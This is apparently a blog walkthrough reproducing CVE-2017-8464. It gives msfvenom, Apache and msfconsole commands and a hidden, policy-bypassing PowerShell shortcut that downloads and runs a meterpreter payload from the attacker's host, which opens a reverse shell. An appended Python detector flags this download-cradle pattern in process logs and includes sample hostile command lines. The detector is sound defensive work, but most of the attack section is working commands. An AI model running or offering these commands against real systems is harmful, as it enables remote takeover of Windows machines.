The attacking machine's IP is 192.168.222.133.
The target machine's IP is 192.168.222.132.
First we generate a PowerShell payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1
![Image [1] - CVE-2017-8464 reproduction (remote shortcut vulnerability)](https://fbi.kim/wp-content/uploads/2019/12/image-100.png)
Copy the generated 1.ps1 to /var/www/html:
cp /root/1.ps1 /var/www/html
![Image [2] - CVE-2017-8464 reproduction (remote shortcut vulnerability)](https://fbi.kim/wp-content/uploads/2019/12/image-101.png)
Start Apache:
service apache2 start
Then we browse to 127.0.0.1/1.ps1 and confirm the file is accessible.
![Image [3] - CVE-2017-8464 reproduction (remote shortcut vulnerability)](https://fbi.kim/wp-content/uploads/2019/12/image-102.png)
On the target machine we create a shortcut whose target is:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.222.133/1.ps1');test.ps1"
Then open it.
![Image [4] - CVE-2017-8464 reproduction (remote shortcut vulnerability)](https://fbi.kim/wp-content/uploads/2019/12/image-103.png)
Create the listener, then connect with meterpreter:
msfconsole
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.222.133
set LPORT 4444
exploit
![Image [5] - CVE-2017-8464 reproduction (remote shortcut vulnerability)](https://fbi.kim/wp-content/uploads/2019/12/image-104.png)
The reproduction succeeded.
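The shortcut target used above (hidden window, execution-policy bypass, `IEX` fed by `Net.WebClient.DownloadString`) is what shows up in process-creation logs on the target. The Python below is an added example, not part of the original post: it flags that command-line shape, including abbreviated parameter spellings. The rule names, the alert condition and the sample command lines are assumptions constructed for illustration.

```python
import re

def _param(name, min_len):
    """Regex for a PowerShell parameter written as any prefix of `name`
    (powershell.exe accepts abbreviations such as -w, -win, -windowstyle)."""
    alts = "|".join(name[:i] for i in range(len(name), min_len - 1, -1))
    return rf"(?<![\w-])[-/](?:{alts})\b"

RULES = {
    # -WindowStyle Hidden, or the enum number 1
    "hidden_window": re.compile(
        _param("windowstyle", 1) + r"\s+(?:hidden|1)\b", re.I),
    # -ExecutionPolicy Bypass/Unrestricted, including the -ep alias
    "policy_bypass": re.compile(
        rf"(?:{_param('executionpolicy', 2)}|(?<![\w-])[-/]ep\b)"
        r"\s+(?:bypass|unrestricted)\b", re.I),
    # IEX / Invoke-Expression fed by a WebClient download
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression)\b.*?\bnet\.webclient\b.*?"
        r"\.download(?:string|data)\s*\(", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"’”)]+", re.I)

def analyze(cmdline):
    """Return matched rule names, extracted URLs and an alert verdict."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(cmdline))
    # Alert only when remote code is fetched AND the launch is concealed or
    # policy-relaxed; a lone "-ExecutionPolicy Bypass" is common in admin jobs.
    alert = "download_cradle" in hits and len(hits) >= 2
    return {"alert": alert, "hits": hits, "urls": URL_RE.findall(cmdline)}

# Constructed sample command lines (192.0.2.0/24 is a documentation range).
SAMPLES = [
    r'''powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/1.ps1')"''',
    r'''powershell.exe -W 1 -ep Bypass -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"''',
    r'powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
    r'powershell -c "Get-ChildItem C:\Users"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        result = analyze(line)
        verdict = "ALERT" if result["alert"] else "ok"
        print(f"{verdict:5} {result['hits']} {result['urls']}")
```

Feed `analyze` the command-line field of process-creation events (for example Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled).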